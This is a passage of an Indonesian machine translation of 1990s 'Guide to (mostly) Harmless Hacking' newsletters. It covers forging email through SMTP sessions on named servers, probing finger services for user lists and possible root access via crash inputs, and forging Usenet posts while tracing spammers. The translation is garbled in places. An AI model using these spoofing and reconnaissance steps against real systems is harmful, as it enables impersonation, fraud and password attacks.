yang berjalan pada sistem Unix, ditampilkan dengan email yang sama:
Jalur Pengembalian: <santa@north.pole.org>
Diterima:
dari callisto.unm.edu oleh nmia.com
dengan smtp
(Linux Smail3.1.28.1 # 4)
id m0uemp4 000LFGC; Jumat, 12 Jul 96 12:20 MDT
Ini mengidentifikasi komputer tempat saya menjalankan program smail. Itu juga menceritakan versi apa dari program smail
sedang berlari.
Rupanya Dari: santa@north.pole.org
Dan inilah pesan "rupanya dari" lagi. Jadi Pine dan Eudora menunjukkan ini adalah surat palsu.
Diterima: dari santa@north.pole.org oleh callisto.unm.edu dengan smtp
(Smail3.1.28.1 # 41) id m0uemnL 0000HFC; Jumat, 12 Jul 96 12:18 MDT
Id Pesan: <m0uemnL 0000HFC@callisto.unm.edu>
Oh, oh! Tidak hanya itu menunjukkan bahwa itu mungkin surat palsu - ia memiliki ID pesan! Ini berarti di suatu tempat
Callisto akan ada log ID pesan yang memberitahu siapa yang telah menggunakan port 25 dan program smail. Kamu melihat,

Halaman 81
setiap kali seseorang log on ke port 25 di komputer itu, alamat email mereka tertinggal di log
dengan ID pesan itu.
Tanggal: Jum, 12 Jul 96 12:18 MDT
Rupanya Dari: santa@north.pole.com
Rupanya Kepada: cmeinel@nmia.com
Berhasil!!!
Jika seseorang menggunakan program email ini untuk melakukan tindakan pengecut, ID pesan itulah yang akan menempatkan
narasi
di ekornya. Jadi, jika Anda ingin memalsukan email, lebih sulit lolos jika Anda mengirimnya ke seseorang yang menggunakan
Pine daripada jika mereka menggunakan Eudora versi gratis. (Anda dapat mengetahui program email apa yang digunakan
seseorang dengan melihat
di tajuk email mereka.)
Tetapi - program email pada port 25 dari banyak host Internet tidak dipertahankan dengan baik seperti callisto.unm.edu.
Beberapa dibela lebih baik, dan beberapa tidak dibela sama sekali. Bahkan, ada kemungkinan bahwa beberapa bahkan tidak
menyimpan log pengguna port 25, menjadikannya sempurna untuk pemalsuan email kriminal.
Jadi hanya karena Anda mendapatkan email dengan tajuk yang tampak sempurna bukan berarti itu asli. Anda perlu semacam
skema verifikasi terenkripsi menjadi hampir pasti email asli.
****************************************
Anda dapat masuk penjara catatan: Jika Anda berpikir untuk menggunakan email palsu untuk melakukan kejahatan, pikirkan lagi.
Jika Anda
membaca ini Anda tidak cukup tahu untuk memalsukan email cukup baik untuk menghindari penangkapan.
*******************************************
Berikut adalah contoh program email yang berbeda, sendmail. Ini akan memberi Anda gambaran tentang variasi kecil
Anda akan mengalami hack ini.
Inilah perintah saya:
telnet ns.Interlink.Net 25
Komputer menjawab:
Mencoba 198.168.73.8 ...
Terhubung ke NS.INTERLINK.NET.
Karakter melarikan diri adalah '^]'.
220 InterLink.NET Sendmail AIX 3.2 / UCB 5.64 / 4.03 siap pada Jum, 12 Jul 1996 15:45
T>
-------------------------------------------------- ----------------------
Transfer terputus!
@ north.pole.org
Dan itu merespons:
250 InterLink.NET Halo santa@north.pole.org (plato.nmia.com)
Oh, oh! Versi sendmail ini sama sekali tidak terkecoh! Lihat bagaimana menempatkan "(plato.nmia.com)" - komputer saya
gunakan untuk peretasan ini - di sana hanya untuk memberi tahu saya bahwa ia mengetahui dari komputer apa yang telah saya
telnet? Tapi apa adanya

Halaman 82
heck, semua host internet tahu info semacam itu. Saya hanya akan maju terus dan mengirim surat palsu. Sekali lagi saya
input tidak memiliki angka di depan, sedangkan respons komputer diawali dengan angka 250:
surat dari: santa@north.pole.com
250 santa@north.pole.com ... Pengirim valid.
rcpt ke: cmeinel@nmia.com
250 cmeinel@nmia.com ... Penerima valid.
data
354 Masukkan email. Akhiri dengan. karakter pada garis dengan sendirinya.
Berhasil!
.
250 Oke
berhenti
221 InterLink.NET: menutup koneksi.
Oke, jenis email apa yang dihasilkan komputer itu? Inilah yang saya lihat menggunakan Pine:
Jalur Pengembalian: <santa@north.pole.org>
Diterima:
dari InterLink.NET oleh nmia.com
dengan smtp
(Linux Smail3.1.28.1 # 4)
id m0ueo7t 000LEKC; Jumat, 12 Juli 96 13:43 MDT
Diterima: dari plato.nmia.com oleh InterLink.NET (AIX 3.2 / UCB 5.64 / 4.03)
id AA23900; Jum, 12 Jul 1996 15:43:20 0400
Ups. Di sini komputer InterLink.NET telah mengungkapkan komputer saya aktif ketika saya melakukan telnet ke port 25.
Namun, banyak orang menggunakan komputer host Internet itu.
Tanggal: Jum, 12 Jul 1996 15:43:20 0400
Dari: santa@north.pole.org
Id Pesan: <9607121943.AA23900@InterLink.NET>
Rupanya Kepada: cmeinel@nmia.com
Berhasil!
OK, ini dia tidak mengatakan "Rupanya-Dari," jadi sekarang saya tahu komputer ns.Interlink.Net adalah cukup bagus
satu untuk mengirim surat palsu dari. Pecinta email yang berpengalaman akan tahu dari baris Received: bahwa ini
surat palsu. Tapi kepalsuannya tidak hanya menyerang Anda.
Saya akan mencoba komputer lain. Hmmm, Universitas California di Berkeley terkenal akan hal itu
penelitian ilmu komputer. Aku ingin tahu seperti apa tuan rumah mereka? Setelah pertama kali mencari Internet numerik
alamat salah satu mesin mereka, saya berikan perintah:
telnet 128.32.152.164 25
Itu merespons dengan:
Mencoba 128.32.152.164 ...
Terhubung ke 128.32.152.164.
Karakter melarikan diri adalah '^]'.
220 remarque.berkeley.edu ESMTP Sendmail 8.7.3 / 1.31 siap pada Kamis, 11 Jul 1996 12
membantu
214 Ini adalah versi Sendmail 8.7.3

Halaman 83
214 Perintah:
214 HELO EHLO MAIL RCPT DATA
214 RSET NOOP Hentikan BANTUAN VRFY
214 EXPN VERB
214 Untuk info lebih lanjut gunakan "BANTUAN <topik>".
214 Untuk melaporkan bug dalam pelaksanaannya kirim email ke
214 sendmail@CS.Berkeley.EDU.
214 Untuk informasi lokal, kirim email ke Postmaster di situs Anda.
214 Akhir dari informasi BANTUAN
Oh, nak, program sendmail yang sedikit berbeda! Saya bertanya-tanya apa lagi yang akan saya sampaikan tentang perintah-
perintah ini?
BANTUAN email
214 MAIL FROM: <sender>
214 Menentukan pengirim.
214 Akhir dari informasi BANTUAN
Kesepakatan besar! Oh, baiklah, mari kita lihat apa yang akan dilakukan komputer ini (yang sekarang kita kenal bernama
remarque)
surat palsu.
MAIL FROM: santa@north.pole.org
250 santa@north.pole.org ... Pengirim ok
Heyyy ... ini menarik ... saya tidak mengatakan "helo" dan program sendmail ini tidak menampar saya!
Bertanya-tanya apa artinya ...
RCPT KE: cmeinel@techbroker.com
250 Penerima ok
DATA
354 Masukkan email, akhiri dengan "." pada garis dengan sendirinya
Ini adalah surat palsu di komputer Berkeley yang saya tidak punya kata sandi.
.
250 MAA23472 Pesan diterima untuk pengiriman
berhenti
221 koneksi penutup remarque.berkeley.edu
Sekarang kita pergi ke Pine dan melihat seperti apa tajuknya:
Jalur Pengembalian: <santa@north.pole.org>
Diterima:
dari nmia.com oleh nmia.com
dengan smtp
(Linux Smail3.1.28.1 # 4)
id m0ueRnW 000LGiC; Kamis, 11 Juli 96 13:53 MDT
Diterima:
dari remarque.berkeley.edu oleh nmia.com
dengan smtp
(Linux Smail3.1.28.1 # 4)
id m0ueRnV 000LGhC; Kamis, 11 Juli 96 13:53 MDT
Rupanya Untuk: <cmeinel@techbroker.com>
Diterima: dari merde.dis.org oleh remarque.berkeley.edu (8.7.3 / 1.31)
id MAA23472; Kamis, 11 Jul 1996 12:49:56 0700 (PDT)

Halaman 84
Lihatlah tiga pesan "diterima". Komputer ISP saya menerima email ini tidak langsung dari
Remarque.berkeley.edu. tetapi dari merde.dis.com, yang pada gilirannya mendapat email dari Remarque.
Hai, saya tahu siapa pemilik merde.dis.org! Jadi komputer Berkeley meneruskan surat palsu ini melalui yang terkenal
ahli keamanan komputer, komputer host internet Pete Shipley! Petunjuk: nama "Merde" adalah lelucon. Begitu juga
"Dis.org."
Sekarang mari kita lihat seperti apa bentuk email dari remarque. Mari kita gunakan Pine lagi:
Tanggal: Kamis, 11 Jul 1996 12:49:56 0700 (PDT)
Dari: santa@north.pole.org
Id Pesan: <199607111949.MAA23472@remarque.berkeley.edu>
Ini adalah surat palsu di komputer Berkeley yang saya tidak punya kata sandi.
Hei, ini cukup kewl. Itu tidak memperingatkan bahwa alamat Santa itu palsu! Bahkan lebih baik, itu menyimpan rahasia
nama komputer yang berasal: plato.nmia.com. Jadi remarque.berkeley.edu adalah komputer yang sangat bagus
dari mana untuk mengirim surat palsu. (Catatan: terakhir kali saya memeriksa, mereka telah memperbaiki remarque, jadi jangan
repot-repot telnetting
sana.)
Tetapi tidak semua program sendmail ramah terhadap email palsu. Lihatlah email yang saya buat dari atropos.c2.org!
telnet atropos.c2.org 25
Mencoba 140.174.185.14 ...
Terhubung ke atropos.c2.org.
Karakter melarikan diri adalah '^]'.
220 atropos.c2.org ESMTP Sendmail 8.7.4 / CSUA siap pada Jum, 12 Jul 1996 15:41:33
membantu
502 Sendmail 8.7.4 BANTUAN tidak diterapkan
Astaga, kamu cukup sopan hari ini, bukan ... Apa-apaan, mari kita bajak ...
helo santa@north.pole.org
501 Nama domain tidak valid
Hei, apa urusanmu, sobat? Program-program sendmail lainnya tidak memberikan nama apa yang saya gunakan dengan "helo."
BAIK,
OKE, saya akan memberi Anda nama domain yang valid. Tapi bukan nama pengguna yang valid!
helo satan@unm.edu
250 atropos.c2.org Halo cmeinel@plato.nmia.com [198.59.166.165], senang bertemu dengan Anda
Verrrry lucu, kawan. Aku bertaruh kau senang bertemu denganku. Mengapa #% & @ Anda menuntut domain yang valid
nama ketika Anda tahu siapa saya selama ini?
surat dari: santa@north.pole.com
250 santa@north.pole.com ... Pengirim ok
rcpt ke: cmeinel@nmia.com
250 Penerima ok
data
354 Masukkan email, akhiri dengan "." pada garis dengan sendirinya
Oh sial!
.
250 PAA13437 Pesan diterima untuk pengiriman
berhenti

Halaman 85
221 atropos.c2.org koneksi penutup
Oke, jenis email apa yang dihasilkan oleh program sendmail kecil yang menjengkelkan itu? Aku bergegas ke Pine dan
mengambil
melihat:
Jalur Pengembalian: <santa@north.pole.com>
Nah, betapa menyenangkannya mengizinkan saya menggunakan alamat palsu saya.
Diterima:
dari atropos.c2.org oleh nmia.com
dengan smtp
(Linux Smail3.1.28.1 # 4)
id m0ueqxh 000LD9C; Jumat, 12 Juli 96 16:45 MDT
Rupanya Kepada: <cmeinel@nmia.com>
Diterima: dari satan.unm.edu (cmeinel@plato.nmia.com [198.59.166.165])
Oh, sungguh spesial! Komputer tidak hanya atropos.c2.org merinci identitas saya yang sebenarnya, tetapi juga mengungkapkan
hal satan.unm.edu itu. Grump ...
itu akan mengajari saya.
oleh atropos.c2.org (8.7.4 / CSUA) dengan SMTP id PAA13437 untuk cmeinel@nmia.com; Jum, 12
Jul 1996 15:44:37 0700 (PDT)
Tanggal: Jum, 12 Jul 1996 15:44:37 0700 (PDT)
Dari: santa@north.pole.com
Id Pesan: <199607122244.PAA13437@atropos.c2.org>
Oh sial!
Jadi, moral dari peretasan kecil itu adalah bahwa ada banyak program surel yang berbeda-beda di sekitar port 25
Host internet. Jadi, jika Anda ingin bersenang-senang dengan mereka, ada baiknya Anda memeriksanya terlebih dahulu sebelum
Anda menggunakannya
mereka untuk pamer.
PANDUAN UNTUK (kebanyakan) HACKING HARMLESS
Vol. 1 Angka 3
Bagaimana jari dapat digunakan untuk meretas host Internet.
_______________________________________________________
Sebelum Anda terlalu bersemangat mempelajari bagaimana jari dapat digunakan untuk memecahkan host Internet, semua harus
Anda hukum
orang-orang penegakan di luar sana, silakan santai Saya tidak memberikan instruksi langkah demi langkah. Saya jelas tidak akan
menyerahkan
kode keluar dari alat cracking kalengan yang tersedia untuk umum yang bisa digunakan oleh setiap pemula untuk mendapatkan
ilegal
akses ke beberapa host.
Apa yang akan Anda baca adalah beberapa prinsip dasar dan teknik di balik cracking dengan jari. Faktanya,
beberapa teknik ini menyenangkan dan legal asalkan tidak terlalu jauh. Dan mereka mungkin memberi tahu Anda a
satu atau dua hal tentang cara membuat host Internet Anda lebih aman.
Anda juga dapat menggunakan informasi ini untuk menjadi seorang cracker. Pilihanmu. Ingatlah apa yang akan terjadi
ingin menjadi "pacar" dari teman satu sel bernama "Spike."
*********************************

Halaman 86
Catatan pemula # 1: Banyak orang menganggap "peretasan" dan "perobekan" adalah sama. Tapi "retak" semakin meningkat
entri ilegal ke komputer. "Hacking" adalah seluruh jagat kewl yang bisa dilakukan dengan komputer, sering kali
tanpa melanggar hukum atau menyebabkan kerugian.
*********************************
Apa itu jari? Ini adalah program yang berjalan pada port 79 dari banyak komputer host Internet. Biasanya digunakan untuk
memberikan informasi tentang orang-orang yang merupakan pengguna komputer yang diberikan.
Untuk ditinjau, mari pertimbangkan cara berbudi luhur namun membosankan untuk memberi komputer jari Anda perintah jari:
jari Joe_Blow@boring.ISP.net
Ini menyebabkan komputer Anda melakukan telnet ke port 79 pada host boring.ISP.net. Ia mendapatkan apa pun yang ada di
.plan
dan .proyek file untuk Joe Blow dan menampilkannya di layar komputer Anda.
Tetapi cara Happy Hacker adalah dengan pertama telnet ke boring.ISP.net port 79, dari mana kita kemudian dapat menjalankan
jarinya
program:
telnet boring.ISP.net 79
Jika Anda adalah warga negara Internet yang baik, Anda kemudian akan memberikan perintah:
Joe_Blow
atau mungkin perintahnya:
jari Joe_Blow
Ini akan memberi Anda hasil yang sama seperti hanya tinggal di komputer Anda sendiri dan memberikan perintah
"Jari Joe_Blow@boring.ISP.net."
Tetapi untuk seorang cracker, ada banyak dan banyak hal lain yang harus dilakukan setelah mendapatkan kendali program jari
boring.ISP.net dengan telnetting ke port 79.
Ah, tapi aku tidak mengajarkan bagaimana melakukan tindak kejahatan. Jadi kita hanya akan membahas prinsip-prinsip umum
tentang bagaimana jari pada umumnya
digunakan untuk masuk ke boring.ISP.net. Anda juga akan mempelajari beberapa hal legal yang bisa Anda coba
melakukan.
Misalnya, beberapa program jari akan merespons perintah:
finger @ boring.ISP.net
Jika Anda kebetulan menemukan program jari yang cukup tua atau cukup percaya untuk menerima perintah ini, Anda
mungkin mendapatkan sesuatu kembali seperti:
[boring.ISP.net]
Nama login
TTY Idle When Where
selamat Prof. Foobar co 1d Rab 08:00 membosankan.ISP.net
Ini memberitahu Anda bahwa hanya satu orang yang masuk, dan dia tidak melakukan apa-apa. Ini artinya jika seseorang harus
berhasil masuk, tidak ada yang mungkin memperhatikan - setidaknya tidak segera.
Perintah lain yang dapat direspon oleh port jari adalah:

Halaman 87
jari
Jika perintah ini berhasil, ini akan memberi Anda daftar lengkap pengguna host ini. Nama-nama pengguna ini kemudian bisa
digunakan untuk memecahkan satu atau dua kata sandi.
Terkadang suatu sistem tidak memiliki batasan tentang seberapa lemahnya sebuah kata sandi. Kata sandi lumpuh yang umum
kebiasaan adalah tidak menggunakan kata sandi sama sekali, kata sandi yang sama dengan nama pengguna, nama depan atau
belakang pengguna, dan
"Tamu." Jika ini tidak berhasil untuk cracker, ada banyak program yang beredar yang mencoba setiap kata
kamus dan setiap nama dalam buku telepon biasa.
********************************
Newbie Note # 2: Apakah kata sandi Anda mudah retak? Jika Anda memiliki akun shell, Anda dapat mengubahnya dengan
perintah:
sandiwara
Pilih kata sandi yang tidak ada dalam kamus atau buku telepon, setidaknya sepanjang 6 karakter, dan termasuk
beberapa karakter yang bukan huruf alfabet.
Kata sandi yang ditemukan dalam kamus tetapi memiliki satu karakter tambahan adalah * bukan * kata sandi yang baik.
********************************
Perintah lain yang kadang-kadang mungkin mendapat respons tidak termasuk:
finger @
jari 0
akar jari
tempat sampah
jari ftp
sistem jari
jari tamu
demo jari
manajer jari
Atau, bahkan dengan menekan <enter> begitu Anda masuk ke port 79 dapat memberi Anda sesuatu yang menarik.
Ada banyak perintah lain yang mungkin atau tidak bisa berfungsi. Tetapi sebagian besar perintah pada kebanyakan sirip ger
program tidak akan memberi Anda apa-apa, karena sebagian besar administrator sistem tidak ingin menyendok banyak
informasi kepada pengunjung biasa. Bahkan, sysadmin yang benar-benar hati-hati akan menonaktifkan jari sepenuhnya. Jadi
kamu akan
bahkan tidak pernah berhasil masuk ke port 79 dari beberapa komputer
Namun, tidak satupun dari perintah ini yang saya tunjukkan akan memberi Anda akses root. Mereka memberikan informasi
hanya.
************************
Catatan pemula # 3: Root! Ini adalah Valhalla dari cracker hard-core. "Root" adalah akun pada multi-pengguna
komputer yang memungkinkan Anda bermain dewa. Ini adalah akun dari mana Anda dapat memasukkan dan menggunakan yang
lain
akun, baca dan modifikasi file apa pun, jalankan program apa pun. Dengan akses root, Anda dapat sepenuhnya menghancurkan
semua data
di boring.ISP.net. (Saya * tidak * menyarankan agar Anda melakukannya!)
***************************
Adalah sah untuk menanyakan program jari dari boring.ISP.net tentang apa saja yang Anda inginkan. Yang terburuk bisa
yang terjadi adalah program akan crash.

Halaman 88
Kecelakaan ... apa yang terjadi jika jari rusak?
Mari kita pikirkan apa yang sebenarnya dilakukan jari. Ini adalah program pertama yang Anda temui saat Anda telnet
port boring.ISP.net 79. Dan sekali di sana, Anda bisa memberikannya perintah yang mengarahkannya untuk membaca file dari
mana saja
akun pengguna yang dapat Anda pilih.
Itu berarti jari dapat melihat akun apa pun.
Itu berarti jika crash, Anda mungkin berakhir di root.
Tolong, jika Anda kebetulan mendapatkan akses root ke host orang lain, segera tinggalkan komputer itu!
Anda sebaiknya memiliki alasan yang bagus untuk administrator sistem dan polisi Anda jika Anda tertangkap!
Jika Anda membuat jari mogok dengan memberikan perintah seperti /// * ^ S, Anda mungkin akan kesulitan mengklaim
bahwa Anda tidak bersalah mencari informasi yang tersedia untuk umum.
*******************
ANDA BISA PERGI KE JAIL TIP # 1: Masuk ke bagian perusahaan yang tidak terbuka untuk umum adalah ilegal. Di
Selain itu, jika Anda menggunakan saluran telepon atau Internet melintasi saluran negara bagian AS untuk masuk ke bagian non-
publik a
komputer, Anda telah melakukan kejahatan federal. Anda tidak harus menyebabkan bahaya sama sekali - itu masih ilegal.
Bahkan jika Anda baru saja mendapatkan akses root dan segera memutuskan koneksi Anda - itu masih ilegal.
*****************
Benar-benar tipe elit akan meretas akun root dari jari dan langsung pergi. Mereka mengatakan terburu-buru nyata
cracking datang dari * dapat * melakukan apa saja untuk membosankan.ISP.net - tetapi menolak godaan.
Elit elit melakukan lebih dari sekadar menahan diri dari mengambil keuntungan dari sistem yang mereka tembus. Mereka
beri tahu administrator sistem bahwa mereka telah meretas komputernya, dan meninggalkan penjelasan
cara memperbaiki lubang keamanan.
**********************************
ANDA BISA PERGI KE JAIL TIP # 2: Ketika Anda masuk ke komputer, header pada paket yang membawa Anda
perintah beri tahu sysadmin dari target Anda siapa Anda. Jika Anda membaca kolom ini, Anda tidak tahu
cukup untuk menutupi jejak Anda. Katakan godaan untuk mendaki!
**********************************
Ah, tapi apa peluangmu untuk mendapatkan root melalui jari? Belum ada milyaran peretas yang menemukannya
bodoh crashable? Bukankah itu menunjukkan bahwa program jari yang berjalan di Internet saat ini semuanya sudah diperbaiki
Anda tidak bisa mendapatkan akses root melalui mereka lagi?
Tidak.
Intinya adalah bahwa setiap administrator sistem yang membiarkan layanan jari berjalan pada sistemnya adalah
mengambil risiko besar. Jika Anda adalah pengguna ISP yang memungkinkan jari, tanyakan pada diri Anda pertanyaan ini:
menggunakannya untuk
beriklan keberadaan Anda di Internet sepadan dengan risikonya?
PANDUAN UNTUK (kebanyakan) HACKING HARMLESS
Vol. 1 Angka 4
Ini hari main hakim sendiri! Bagaimana mendapatkan spammer Usenet menggebrak ISP mereka.
_______________________________________________________

Halaman 89
Bagaimana Anda suka ketika grup berita Anda mabuk mendapatkan 900 iklan seks dan Dapatkan Uang Cepat
skema piramida? Jika tidak ada yang pernah membuat orang-orang itu membayar penghinaan mereka, segera Usenet akan
dibanjiri
dengan kasar.
Benar-benar menggoda, bukan, menggunakan pengetahuan peretasan kami untuk meledakkan orang-orang ini ke kerajaan. Tapi
banyak
saat itu seperti menggunakan bom atom untuk membunuh semut. Mengapa berisiko masuk penjara ketika ada cara hukum untuk
mempertahankannya
ini hama Internet dalam perjalanan?
Masalah Happy hacker ini akan menunjukkan kepada Anda beberapa cara untuk memerangi spam Usenet.
Spammer mengandalkan email palsu dan kiriman Usenet. Seperti yang kita pelajari dalam Panduan kedua untuk (kebanyakan)
Tidak Berbahaya
Meretas, mudah untuk memalsukan email. Yah, itu juga mudah untuk memalsukan posting Usenet.
*******************
Catatan Pemula # 1: Usenet adalah bagian dari Internet yang terdiri dari sistem grup diskusi online
disebut "grup berita." Contoh grup berita adalah rec.humor, comp.misc, news.announce.newusers,
sci.space.policy, dan alt.sex. Ada lebih dari 10.000 grup berita. Usenet dimulai pada 1980 sebagai Unix
jaringan yang menghubungkan orang-orang yang ingin - Anda dapat menebaknya - untuk berbicara tentang Unix. Kemudian
beberapa orang ingin
untuk berbicara tentang hal-hal seperti fisika, penerbangan luar angkasa, humor di barroom, dan seks. Sisanya adalah sejarah.
*******************
Berikut ini ringkasan singkat cara memalsukan posting Usenet. Sekali lagi, kami menggunakan teknik telnetting ke a
port spesifik. Port Usenet biasanya terbuka hanya untuk mereka yang memiliki akun pada sistem itu. Jadi, Anda akan
membutuhkannya
untuk telnet dari akun shell ISP Anda kembali ke ISP Anda sendiri sebagai berikut:
telnet news.myISP.com nntp
di mana Anda mengganti bagian dari alamat email Anda yang mengikuti @ untuk "myISP.com." Anda juga memiliki
pilihan menggunakan "119" bukannya "nntp."
Dengan ISP saya, saya mendapatkan hasil ini:
Mencoba 198.59.115.25 ...
Terhubung ke sloth.swcp.com.
Karakter melarikan diri adalah '^]'.
200 sloth.swcp.com InterNetNews Server NNRP INN 1.4unoff4 05- Mar-96 siap (dikirim)
Sekarang ketika kita tiba-tiba dalam sebuah program yang tidak kita ketahui dengan baik, kita meminta:
membantu
Dan kita mendapatkan:
100 perintah hukum
Nama pengguna authinfo | pass Password | generic <prog> <args>
artikel [MessageID | Nomor]
tubuh [MessageID | Nomor]
tanggal
newsgroup grup
head [MessageID | Number]
membantu
saya sudah
terakhir

Halaman 90
daftar [aktif | newsgroup | distribusi | skema]
listgroup newsgroup
pembaca mode
newgroups yymmdd hhmmss ["GMT"] [<distribusi>]
newnews newsgroup yymmdd hhmmss ["GMT"] [<distribusi>]
berikutnya
pos
budak
stat [MessageID | Nomor]
xgtitle [group_pattern]
header xhdr [rentang | MessageID]
xover [rentang]
rentang header xpat | tepuk MessageID [morepat ...]
xpath MessageID
Laporkan masalah ke <usenet@swcp.com>
Gunakan imajinasi Anda dengan perintah-perintah ini. Juga, jika Anda ingin memalsukan posting dari ISP selain dari Anda
sendiri, perlu diingat bahwa beberapa komputer host Internet memiliki port nntp yang tidak memerlukan kata sandi atau
kata sandi yang mudah ditebak seperti "posting." Tapi - ini bisa menjadi upaya yang cukup untuk menemukan port nntp yang
tidak dijaga.
Jadi, karena Anda biasanya harus melakukan ini di ISP Anda sendiri, ini jauh lebih sulit daripada menempa email.
Ingat saja ketika memalsukan posting Usenet yang baik email palsu maupun posting Usenet dapat dengan mudah dideteksi -
jika Anda tahu apa yang harus dicari. Dan dimungkinkan untuk mengetahui di mana mereka dipalsukan. Setelah Anda
mengidentifikasi di mana
benar-benar berasal dari spam, Anda dapat menggunakan ID pesan untuk menunjukkan kepada sysadmin siapa yang akan
ditendang keluar.
Biasanya Anda tidak akan dapat mempelajari identitas pelakunya sendiri. Tapi Anda bisa membatalkan ISP mereka
akun mereka!
Tentu, tipe Spam King ini sering muncul kembali dengan ISP lain yang mudah tertipu. Tapi mereka selalu dalam pelarian.
Dan, hei, kapan terakhir kali Anda mendapat Kevin Gila "Penawaran Gratis Hebat?" Jika bukan karena kita Net
waspada, kotak email Anda dan kelompok berita akan terus-menerus dibujuk untuk kerajaan datang.
Dan - serangan spam yang akan saya ajarkan kepada Anda benar-benar legal! Lakukan dan Anda adalah Orang Baik yang dapat
disertifikasi.
Lakukan di pesta dan ajari teman-teman Anda untuk melakukannya juga. Kami tidak bisa mendapatkan terlalu banyak penjaga
spam di luar sana!
Hal pertama yang harus kita lakukan adalah meninjau cara membaca tajuk pos dan email Usenet.
Header adalah sesuatu yang menunjukkan rute yang diambil email atau pos Usenet untuk masuk ke komputer Anda. Saya t
memberikan nama komputer host Internet yang telah digunakan dalam pembuatan dan transmisi a
pesan. Namun, ketika sesuatu telah dipalsukan, nama komputer itu mungkin palsu. Atau, yang
pemalsu terampil dapat menggunakan nama-nama host nyata. Tetapi hacker yang ahli dapat mengetahui apakah suatu host
terdaftar di Internet
header benar-benar digunakan.
Pertama kita akan mencoba contoh spam Usenet palsu. Tempat yang sangat bagus untuk menemukan spam ada di alt.personals.
ini
tidak hampir juga diawasi oleh penjaga anti-spam seperti, katakanlah, rec.aviation.military. (Orang-orang spam pilot pilot di
risiko mereka sendiri!)
Jadi di sini adalah contoh spam scam yang matang, seperti yang ditunjukkan dengan pembaca Usenet berbasis Unix, “tin.”
Kamis, 22 Agustus 1996 23:01:56 alt.personals Thread 134 dari 450
Baris 110 >>>> PERIKSA KOMPATIBILITAS INSTAN GRATIS UNTUK SEL Tidak ada tanggapan
ppgc@ozemail.com.au glennys e clarke di OzEmail Pty Ltd - Australia
KLIK DI SINI UNTUK PERIKSA KOMPATIBILITAS INSTAN GRATIS ANDA!

Halaman 91
http://www.perfect-partners.com.au
MENGAPA TUNGGAL SELEKTIF MEMILIH KAMI
Di Perfect Partners (Newcastle) International, kami pribadi dan
rahasia. Kami memperkenalkan para hadirin sekalian untuk persahabatan
dan pernikahan. Dengan pengalaman lebih dari 15 tahun, Perfect Partners adalah satu
dari konsultan hubungan Internet terbesar dan paling sukses.
Tentu saja hal pertama yang melompat keluar adalah alamat email balasan mereka. Kami penjaga internet biasanya selalu
mengirim
salin kembali ke alamat email spammer.
Pada grup yang banyak dibaca seperti alt.personals, jika hanya satu dari seratus pembaca yang melemparkan kembali spam ke
wajah poster, itu adalah longsoran bom surat. Longsoran ini segera memberitahukan sysadmin dari
ISP dengan adanya spammer, dan akun spam perpisahan.
Jadi untuk menunda tanggapan main hakim sendiri yang tak terhindarkan, saat ini sebagian besar spammer menggunakan alamat
email palsu.
Tapi hanya untuk memastikan alamat email itu palsu, saya keluar dari kaleng dan pada prompt Unix berikan perintah:
whois ozemail.com.au
Kami mendapatkan jawabannya:
Tidak cocok untuk "OZEMAIL.COM.AU"
Namun, itu tidak membuktikan apa-apa, karena "au" di akhir alamat email berarti itu adalah
Alamat Australia Sayangnya "whois" tidak berfungsi di sebagian besar Internet di luar AS.
Langkah selanjutnya adalah mengirim email sesuatu yang menjengkelkan ke alamat ini. Salinan spam yang menyinggung
biasanya
cukup menjengkelkan. Tapi tentu saja memantul kembali dengan pesan alamat tidak seperti itu.
Selanjutnya saya pergi ke halaman Web yang diiklankan. Lihatlah, ia memiliki alamat email untuk pakaian ini,
perfect.partners@hunterlink.net.au. Mengapa saya tidak terkejut bahwa ini berbeda dari alamat di
alt.pribadi spam?
Kami bisa berhenti di sini dan menghabiskan satu atau dua jam mengirimkan email dengan lampiran 5 MB
perfect.partners@hunterlink.net.au. Hmmm, mungkin gif kawin hippopotami?
*****************************
Anda dapat pergi ke catatan penjara! Mailbombing adalah cara untuk mendapat masalah besar. Menurut pakar keamanan
komputer
Ira Winkler, “Adalah ilegal mengirimkan bom kepada spam. Jika terbukti bahwa Anda menyebabkan keuangan
kehilangan, yang akan mencakup menyebabkan jam kerja pulih dari spamming, Anda bertanggung jawab secara pidana. Jika
sebuah
sistem tidak dikonfigurasi dengan benar, dan memiliki direktori mail pada drive sistem, Anda dapat mengeluarkan
sistem keseluruhan. Itu membuatnya semakin kriminal. ”
*****************************
Mendesah. Karena mailbombing yang disengaja itu ilegal, saya tidak bisa mengirim gif perkawinan itu dengan hippopotami. Jadi
yang saya lakukan adalah
email satu salinan spam itu kembali ke perfect.partners. Sekarang ini mungkin terlihat seperti pembalasan yang lemah. Dan kita
akan segera belajar bagaimana melakukan lebih banyak lagi. Tetapi bahkan hanya mengirim satu pesan email ke orang-orang ini
dapat menjadi
bagian dari gelombang pasang protes yang menjatuhkan mereka dari Internet. Jika hanya satu dari seribu orang yang melihat
spam mereka pergi ke situs web mereka dan mengirim email protes, mereka masih dapat memperoleh ribuan protes dari setiap
posting.

Halaman 92
Volume email yang tinggi ini mungkin cukup untuk mengingatkan sysadmin ISP mereka terhadap spamming, dan spam selamat
tinggal
rekening.
Lihatlah apa yang dikatakan pemilik / operator ISP Dale Amon tentang kekuatan protes email:
"Seseorang tidak perlu menelepon untuk 'bom surat.' Itu terjadi begitu saja. Setiap kali saya melihat spam, saya secara otomatis
mengirim satu
salinan pesan mereka kembali kepada mereka. Saya pikir ribuan orang lain melakukan hal yang sama. Jika mereka
spammer) sembunyikan alamat pengirim mereka, saya menemukannya dan mempostingnya jika saya punya waktu. Saya tidak
memiliki keluhan dan rasa bersalah
lebih dari itu."
Sekarang Dale juga pemilik dan direktur teknis ISP terbesar dan tertua di Irlandia Utara, jadi dia
tahu beberapa cara yang baik untuk menemukan ISP yang menyimpan spammer. Dan kita akan belajar salah satunya.
Tujuan kami adalah untuk mencari tahu siapa yang menghubungkan pakaian ini ke Internet, dan mengambil koneksi itu! Percaya
saya, ketika orang-orang yang menjalankan ISP menemukan salah satu pelanggan mereka adalah spammer, mereka biasanya
tidak membuang
waktu menendangnya keluar.
Langkah pertama kami adalah membedah header posting ini untuk melihat bagaimana itu dipalsukan dan di mana.
Karena pembaca berita saya (timah) tidak memiliki cara untuk menampilkan tajuk, saya menggunakan perintah "m" untuk
mengirim email salinan
posting ini ke akun shell saya.
Tiba beberapa menit kemudian. Saya membukanya di program email "Pine" dan mendapatkan tajuk yang kaya detail:
Path:
sloth.swcp.com! news.ironhorse.com! news.uoregon.edu! vixen.cso.uiuc.edu! news.stealth.net! nntp04.primen
